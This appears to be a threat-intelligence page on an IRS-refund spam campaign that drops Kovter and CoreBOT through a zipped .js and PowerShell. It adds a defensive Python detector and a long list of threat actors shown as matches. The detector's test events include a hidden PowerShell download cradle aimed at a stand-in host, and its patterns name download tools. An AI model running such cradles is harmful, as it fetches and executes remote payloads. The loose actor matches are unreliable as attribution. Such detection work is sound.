Trusted Design

IRS Refund-themed Spam Campaign Delivers Kovter and CoreBOT

Overview

IOCs derived from the post at https://heimdalsecurity.com/blog/security-alert-fileless-kovter-teams-modular-corebot-malware-irs-spam-campaign/.

The campaign is IRS-refund themed spam: the email claims to be a refund notification from the IRS and carries a .zip attachment. Inside the archive is a .js file. Opening the archive alone does nothing; when the recipient launches the .js (Windows hands .js files to the Windows Script Host), the script invokes Windows PowerShell to download the primary payload. The primary payload appears to be Kovter, with CoreBOT delivered as the secondary payload.

Kovter is a Trojan whose original use was click-fraud operations on the PCs it infected. Earlier in the year of the original post it was seen adding new cloaking tricks to evade detection; its core strengths are staying hidden and persisting for long periods in the memory of compromised machines rather than as a conventional file on disk. CoreBOT is modular malware that lets criminals build on it, and it evolved from a data stealer into financial malware almost overnight that same year.
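As an added example, not code from the Heimdal post or from this Pulse, the two points in that chain where a defender can catch it: a mail-gateway check that flags ZIP attachments carrying a directly executable member (the .js, including double extensions such as .pdf.js), and a process-creation rule that flags a script host (wscript.exe, cscript.exe, mshta.exe) spawning PowerShell, with extra reasons attached when the command line carries a download cradle or an encoded command. The archive, the process events and the example.invalid URL are all constructed for this example; the event format is a constructed tab-separated triple of the three fields Sysmon Event ID 1 records (ParentImage, Image, CommandLine).

```python
"""Triage helpers for the two hops in the chain described above (ZIP -> .js ->
PowerShell download): one for mail-gateway attachment checks, one for
endpoint process-creation telemetry. All inputs below are constructed."""
import io
import re
import zipfile

# File types inside an archive that Windows will execute directly on double-click.
EXECUTABLE_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta",
                   ".ps1", ".cmd", ".bat", ".lnk", ".scr", ".exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Common PowerShell download cradles as they appear in command lines.
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"
    r"|start-bitstransfer|\bcurl\b|\bwget\b", re.I)
# -EncodedCommand and the abbreviations PowerShell accepts (-e, -ec, -enc, ...).
ENCODED_RE = re.compile(r"\s-e(?:c|n[a-z]*)?\s", re.I)


def build_sample_zip() -> bytes:
    """Constructed stand-in for the attachment: a ZIP whose .js has a harmless body."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("IRS_Refund_Notification.pdf.js", "// placeholder, not the real script\n")
        zf.writestr("README.txt", "nothing here\n")
    return buf.getvalue()


def risky_archive_members(zip_bytes: bytes) -> list[str]:
    """Names of archive members with a directly executable extension.
    Double extensions such as .pdf.js are judged by the last one, as Windows does."""
    risky = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            base = info.filename.rsplit("/", 1)[-1]
            ext = ("." + base.rsplit(".", 1)[-1].lower()) if "." in base else ""
            if ext in EXECUTABLE_EXTS:
                risky.append(info.filename)
    return risky


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_script_host_to_powershell(event_lines):
    """Flag process-creation events where a script host spawned PowerShell.
    Each line is TAB-separated: ParentImage, Image, CommandLine (constructed
    format carrying the same three fields Sysmon event 1 records).
    Returns one dict per hit; the bare chain is always a hit, cradle and
    encoded-command matches are appended as further reasons."""
    hits = []
    for line in event_lines:
        parent, image, cmdline = line.rstrip("\n").split("\t", 2)
        if _basename(parent) not in SCRIPT_HOSTS or _basename(image) not in POWERSHELL:
            continue
        reasons = ["script-host-spawned-powershell"]
        if DOWNLOAD_RE.search(cmdline):
            reasons.append("download-cradle")
        if ENCODED_RE.search(f" {cmdline} "):
            reasons.append("encoded-command")
        hits.append({"parent": parent, "cmdline": cmdline, "reasons": reasons})
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed; example.invalid is a reserved, non-resolving name
    "C:\\Windows\\System32\\wscript.exe\t" + PS + "\tpowershell.exe -NoP -W Hidden -ExecutionPolicy Bypass "
    "-c \"(New-Object Net.WebClient).DownloadFile('http://example.invalid/r.exe','C:\\Users\\Public\\r.exe')\"",
    "C:\\Windows\\explorer.exe\t" + PS + "\tpowershell.exe -NoProfile -Command Get-Process",
    "C:\\Windows\\System32\\cscript.exe\t" + PS + "\tpowershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1",
    "C:\\Windows\\System32\\wscript.exe\t" + PS + "\tpowershell.exe -NoP -enc SQBFAFgA",
]

if __name__ == "__main__":
    print("risky members:", risky_archive_members(build_sample_zip()))
    for hit in detect_script_host_to_powershell(SAMPLE_EVENTS):
        print(",".join(hit["reasons"]), "<-", hit["cmdline"])
```

The bare script-host-to-PowerShell chain is kept as a hit on its own because in most estates it is rare enough to review, with the cradle and encoded-command reasons raising severity; an environment that runs logon scripts this way should exempt those script paths rather than drop the rule. Because Kovter persists in memory rather than as a file that stays on disk, the process-creation hop is the more dependable of the two signals.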

Created: 2026-02-23

Indicators

No indicators were found.

Similar Pulses

Threat actors related to this Pulse (fact-based)

APT32

Score: 23.81
Matched TTPs:
  • T1113 - Screen Capture
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1598.003 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1105 - Ingress Tool Transfer
  • T1027.007 - Dynamic API Resolution
  • T1556 - Modify Authentication Process
Link to MITRE →

Turla

Score: 25.16
Matched TTPs:
  • T1113 - Screen Capture
  • T1056.001 - Keylogging
  • T1606.002 - SAML Tokens
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1547.002 - Authentication Package
  • T1059.012 - Hypervisor CLI
  • T1546.016 - Installer Packages
Link to MITRE →

Kimsuky

Score: 35.81
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1053.007 - Container Orchestration Job
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1598.003 - Spearphishing Link
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1205 - Traffic Signaling
  • T1552.003 - Shell History
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
  • T1547.002 - Authentication Package
  • T1537 - Transfer Data to Cloud Account
  • T1526 - Cloud Service Discovery
Link to MITRE →

Sea Turtle

Score: 9.00
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1059.013 - Container CLI/API
Link to MITRE →

Ember Bear

Score: 13.02
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1005 - Data from Local System
  • T1558 - Steal or Forge Kerberos Tickets
  • T1136.002 - Domain Account
  • T1218.010 - Regsvr32
Link to MITRE →

Indrik Spider

Score: 11.27
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1003.007 - Proc Filesystem
  • T1546.016 - Installer Packages
Link to MITRE →

Agrius

Score: 8.72
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1176.001 - Browser Extensions
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
Link to MITRE →

Contagious Interview

Score: 29.40
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1021.006 - Windows Remote Management
  • T1552.003 - Shell History
  • T1199 - Trusted Relationship
  • T1059.006 - Python
  • T1221 - Template Injection
  • T1556 - Modify Authentication Process
Link to MITRE →

Sandworm Team

Score: 29.85
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1005 - Data from Local System
  • T1558 - Steal or Forge Kerberos Tickets
  • T1049 - System Network Connections Discovery
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
  • T1547.002 - Authentication Package
  • T1218.010 - Regsvr32
  • T1546.016 - Installer Packages
Link to MITRE →

Star Blizzard

Score: 7.52
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1199 - Trusted Relationship
Link to MITRE →

Lazarus Group

Score: 33.61
Matched TTPs:
  • T1132.001 - Standard Encoding
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1205 - Traffic Signaling
  • T1199 - Trusted Relationship
  • T1547.002 - Authentication Package
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1546.016 - Installer Packages
  • T1055.005 - Thread Local Storage
  • T1105 - Ingress Tool Transfer
  • T1556 - Modify Authentication Process
Link to MITRE →

TA577

Score: 3.84
Matched TTPs:
  • T1132.001 - Standard Encoding
Link to MITRE →

Moonstone Sleet

Score: 15.83
Matched TTPs:
  • T1132.001 - Standard Encoding
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1059.011 - Lua
  • T1027.007 - Dynamic API Resolution
Link to MITRE →

Scattered Spider

Score: 9.96
Matched TTPs:
  • T1666 - Modify Cloud Resource Hierarchy
  • T1136.002 - Domain Account
  • T1552.003 - Shell History
  • T1199 - Trusted Relationship
Link to MITRE →

FIN4

Score: 9.93
Matched TTPs:
  • T1666 - Modify Cloud Resource Hierarchy
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1574.010 - Services File Permissions Weakness
Link to MITRE →

Winnti Group

Score: 3.29
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
Link to MITRE →

APT41

Score: 15.18
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1176.001 - Browser Extensions
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
  • T1218.010 - Regsvr32
  • T1537 - Transfer Data to Cloud Account
  • T1027.007 - Dynamic API Resolution
Link to MITRE →

Rocke

Score: 19.61
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1059.010 - AutoHotKey & AutoIT
  • T1114.003 - Email Forwarding Rule
  • T1059.011 - Lua
  • T1059.013 - Container CLI/API
  • T1537 - Transfer Data to Cloud Account
  • T1105 - Ingress Tool Transfer
Link to MITRE →

TeamTNT

Score: 17.62
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1606.002 - SAML Tokens
  • T1176.001 - Browser Extensions
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

APT28

Score: 22.01
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1547.002 - Authentication Package
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1105 - Ingress Tool Transfer
  • T1566.003 - Spearphishing via Service
Link to MITRE →

UNC3886

Score: 17.60
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1606.002 - SAML Tokens
  • T1021.006 - Windows Remote Management
  • T1136.002 - Domain Account
  • T1547.015 - Login Items
  • T1218.010 - Regsvr32
Link to MITRE →

Mustang Panda

Score: 33.30
Matched TTPs:
  • T1053.007 - Container Orchestration Job
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1169 - Sudo
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
  • T1218.010 - Regsvr32
  • T1526 - Cloud Service Discovery
  • T1055.005 - Thread Local Storage
  • T1105 - Ingress Tool Transfer
  • T1556 - Modify Authentication Process
Link to MITRE →

FIN13

Score: 11.89
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1552.003 - Shell History
  • T1199 - Trusted Relationship
  • T1105 - Ingress Tool Transfer
Link to MITRE →

OilRig

Score: 26.03
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1598.003 - Spearphishing Link
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1005 - Data from Local System
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1526 - Cloud Service Discovery
  • T1556 - Modify Authentication Process
Link to MITRE →

LuminousMoth

Score: 10.04
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1091 - Replication Through Removable Media
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1105 - Ingress Tool Transfer
Link to MITRE →

Salt Typhoon

Score: 5.69
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1199 - Trusted Relationship
  • T1556 - Modify Authentication Process
Link to MITRE →

APT29

Score: 17.23
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1218.009 - Regsvcs/Regasm
  • T1555.004 - Windows Credential Manager
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

Play

Score: 5.47
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1552.003 - Shell History
  • T1199 - Trusted Relationship
Link to MITRE →

Aoqin Dragon

Score: 9.47
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

RedCurl

Score: 16.28
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1591.003 - Identify Business Tempo
  • T1598.003 - Spearphishing Link
  • T1574.010 - Services File Permissions Weakness
  • T1059.011 - Lua
  • T1105 - Ingress Tool Transfer
Link to MITRE →

Ke3chang

Score: 17.50
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1176.001 - Browser Extensions
  • T1027.008 - Stripped Payloads
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
  • T1027.007 - Dynamic API Resolution
Link to MITRE →

FIN7

Score: 29.84
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1205 - Traffic Signaling
  • T1011.001 - Exfiltration Over Bluetooth
  • T1564.002 - Hidden Users
  • T1199 - Trusted Relationship
  • T1547.002 - Authentication Package
  • T1105 - Ingress Tool Transfer
  • T1027.007 - Dynamic API Resolution
Link to MITRE →

Malteiro

Score: 5.75
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1552.003 - Shell History
Link to MITRE →

APT12

Score: 5.55
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1547.002 - Authentication Package
  • T1218.010 - Regsvr32
Link to MITRE →

Machete

Score: 3.43
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.012 - Hypervisor CLI
Link to MITRE →

Elderwood

Score: 6.97
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

Transparent Tribe

Score: 7.59
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1105 - Ingress Tool Transfer
Link to MITRE →

Dragonfly

Score: 8.60
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1546.016 - Installer Packages
Link to MITRE →

WIRTE

Score: 4.08
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1199 - Trusted Relationship
Link to MITRE →

RTM

Score: 3.43
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.012 - Hypervisor CLI
Link to MITRE →

APT-C-36

Score: 4.80
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
Link to MITRE →

CURIUM

Score: 3.43
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.012 - Hypervisor CLI
Link to MITRE →

Gallmaker

Score: 3.95
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.011 - Lua
Link to MITRE →

Tropic Trooper

Score: 12.36
Matched TTPs:
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1218.010 - Regsvr32
  • T1562.011 - Spoof Security Alerting
  • T1105 - Ingress Tool Transfer
Link to MITRE →

Dark Caracal

Score: 4.61
Matched TTPs:
  • T1087.002 - Domain Account
  • T1059.012 - Hypervisor CLI
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

PLATINUM

Score: 5.61
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1558 - Steal or Forge Kerberos Tickets
  • T1059.012 - Hypervisor CLI
Link to MITRE →

menuPass

Score: 6.27
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
Link to MITRE →

TA551

Score: 6.88
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1558 - Steal or Forge Kerberos Tickets
  • T1562.011 - Spoof Security Alerting
Link to MITRE →

HEXANE

Score: 6.01
Matched TTPs:
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1199 - Trusted Relationship
  • T1547.002 - Authentication Package
Link to MITRE →

FIN8

Score: 8.41
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1526 - Cloud Service Discovery
  • T1556 - Modify Authentication Process
Link to MITRE →

Threat Group-3390

Score: 23.74
Matched TTPs:
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1218.003 - CMSTP
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1537 - Transfer Data to Cloud Account
  • T1526 - Cloud Service Discovery
  • T1546.017 - Udev Rules
Link to MITRE →

BITTER

Score: 5.98
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
Link to MITRE →

APT37

Score: 12.64
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.011 - Lua
  • T1547.002 - Authentication Package
  • T1218.010 - Regsvr32
  • T1562.011 - Spoof Security Alerting
  • T1059.012 - Hypervisor CLI
Link to MITRE →

LazyScripter

Score: 8.28
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1136.002 - Domain Account
Link to MITRE →

PROMETHIUM

Score: 8.62
Matched TTPs:
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1547.015 - Login Items
  • T1059.012 - Hypervisor CLI
Link to MITRE →

TA505

Score: 10.56
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

APT39

Score: 15.47
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1499.002 - Service Exhaustion Flood
  • T1059.010 - AutoHotKey & AutoIT
  • T1199 - Trusted Relationship
  • T1547.002 - Authentication Package
  • T1537 - Transfer Data to Cloud Account
  • T1027.007 - Dynamic API Resolution
Link to MITRE →

Higaisa

Score: 7.88
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1218.010 - Regsvr32
  • T1546.017 - Udev Rules
Link to MITRE →

Wizard Spider

Score: 12.74
Matched TTPs:
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1526 - Cloud Service Discovery
  • T1027.007 - Dynamic API Resolution
  • T1556 - Modify Authentication Process
Link to MITRE →

Magic Hound

Score: 5.80
Matched TTPs:
  • T1087.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1547.002 - Authentication Package
  • T1059.012 - Hypervisor CLI
Link to MITRE →

Cobalt Group

Score: 5.94
Matched TTPs:
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
Link to MITRE →

Storm-1811

Score: 9.93
Matched TTPs:
  • T1087.002 - Domain Account
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1567.003 - Exfiltration to Text Storage Sites
Link to MITRE →

Inception

Score: 4.01
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
Link to MITRE →

EXOTIC LILY

Score: 5.13
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1218.010 - Regsvr32
Link to MITRE →

Saint Bear

Score: 7.18
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1218.010 - Regsvr32
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

FIN6

Score: 7.66
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1027.007 - Dynamic API Resolution
  • T1556 - Modify Authentication Process
Link to MITRE →

Patchwork

Score: 7.82
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

TA459

Score: 3.16
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1218.010 - Regsvr32
Link to MITRE →

Nomadic Octopus

Score: 3.85
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1558 - Steal or Forge Kerberos Tickets
Link to MITRE →

Gorgon Group

Score: 8.21
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1114.003 - Email Forwarding Rule
  • T1199 - Trusted Relationship
Link to MITRE →

APT19

Score: 7.78
Matched TTPs:
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1199 - Trusted Relationship
  • T1059.012 - Hypervisor CLI
Link to MITRE →

TA2541

Score: 12.15
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1537 - Transfer Data to Cloud Account
  • T1546.017 - Udev Rules
Link to MITRE →

Earth Lusca

Score: 22.01
Matched TTPs:
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
  • T1562.011 - Spoof Security Alerting
  • T1059.012 - Hypervisor CLI
  • T1546.016 - Installer Packages
Link to MITRE →

SideCopy

Score: 3.64
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1091 - Replication Through Removable Media
Link to MITRE →

Mofang

Score: 4.81
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1546.017 - Udev Rules
Link to MITRE →

Leviathan

Score: 15.51
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1218.010 - Regsvr32
  • T1562.011 - Spoof Security Alerting
  • T1059.012 - Hypervisor CLI
  • T1546.016 - Installer Packages
  • T1546.017 - Udev Rules
Link to MITRE →

Tonto Team

Score: 3.16
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1218.010 - Regsvr32
Link to MITRE →

Andariel

Score: 10.41
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1136.002 - Domain Account
  • T1218.010 - Regsvr32
  • T1562.011 - Spoof Security Alerting
  • T1059.012 - Hypervisor CLI
Link to MITRE →

BRONZE BUTLER

Score: 18.52
Matched TTPs:
  • T1087.002 - Domain Account
  • T1591.003 - Identify Business Tempo
  • T1598.003 - Spearphishing Link
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1562.011 - Spoof Security Alerting
  • T1059.012 - Hypervisor CLI
Link to MITRE →

APT38

Score: 16.77
Matched TTPs:
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1199 - Trusted Relationship
  • T1059.012 - Hypervisor CLI
  • T1537 - Transfer Data to Cloud Account
  • T1059.005 - Visual Basic
  • T1027.007 - Dynamic API Resolution
Link to MITRE →

MuddyWater

Score: 14.63
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1199 - Trusted Relationship
  • T1547.002 - Authentication Package
  • T1218.010 - Regsvr32
  • T1562.011 - Spoof Security Alerting
  • T1059.013 - Container CLI/API
Link to MITRE →

Molerats

Score: 6.38
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1546.017 - Udev Rules
Link to MITRE →

admin@338

Score: 5.68
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1003.007 - Proc Filesystem
  • T1218.010 - Regsvr32
Link to MITRE →

Gamaredon Group

Score: 24.57
Matched TTPs:
  • T1087.002 - Domain Account
  • T1591.003 - Identify Business Tempo
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1205 - Traffic Signaling
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
  • T1547.002 - Authentication Package
  • T1059.013 - Container CLI/API
  • T1546.017 - Udev Rules
Link to MITRE →

Darkhotel

Score: 14.06
Matched TTPs:
  • T1087.002 - Domain Account
  • T1591.003 - Identify Business Tempo
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1564.002 - Hidden Users
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
Link to MITRE →

The White Company

Score: 5.21
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1218.010 - Regsvr32
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

APT33

Score: 6.75
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1556 - Modify Authentication Process
Link to MITRE →

Silence

Score: 4.91
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1027.007 - Dynamic API Resolution
Link to MITRE →

